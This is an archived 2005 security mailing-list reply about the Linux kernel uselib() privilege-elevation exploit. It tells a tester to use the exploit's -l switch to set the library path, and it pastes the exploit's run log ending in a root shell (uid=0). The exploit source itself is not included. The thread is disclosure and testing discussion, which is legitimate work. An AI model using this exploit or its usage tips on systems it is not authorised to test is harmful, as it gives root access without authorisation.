lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20050108112114.GA74421@bsquad.sm.pl>
From: appelast at drumnbass.art.pl (Karol Wiesek)
Subject: Linux kernel uselib() privilege elevation,
	corrected

On Sat, Jan 08, 2005 at 11:38:34AM +0100, Frank Dietrich wrote:
=> Hi there,
=> 
=> Paul Starzetz <ihaquer@...c.pl> wrote:
=> > Synopsis:  Linux kernel uselib() privilege elevation
=> > Product:   Linux kernel
=> > Version:   2.4 up to and including 2.4.29-rc2, 2.6 up to and
=> 
=> Is the system allways compromisable whitout tmpfs support in the
=> kernel?
=> 
=> I tried your exploit sample to test my systems. As normal user I get
=> can't write to /dev/shm. /dev/shm here only writeable for root.
=> 

Use -l switch to specify location of lib.

[appelast@...quik appelast]$ ./ex -l ./lib

[+] SLAB cleanup
    child 1 VMAs 65527
    child 2 VMAs 65527
    child 3 VMAs 33067
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf75c000
    Wait... -
[+] race won maps=10888
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc8a66000
[+] gate modified ( 0xffec90fc 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b#

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ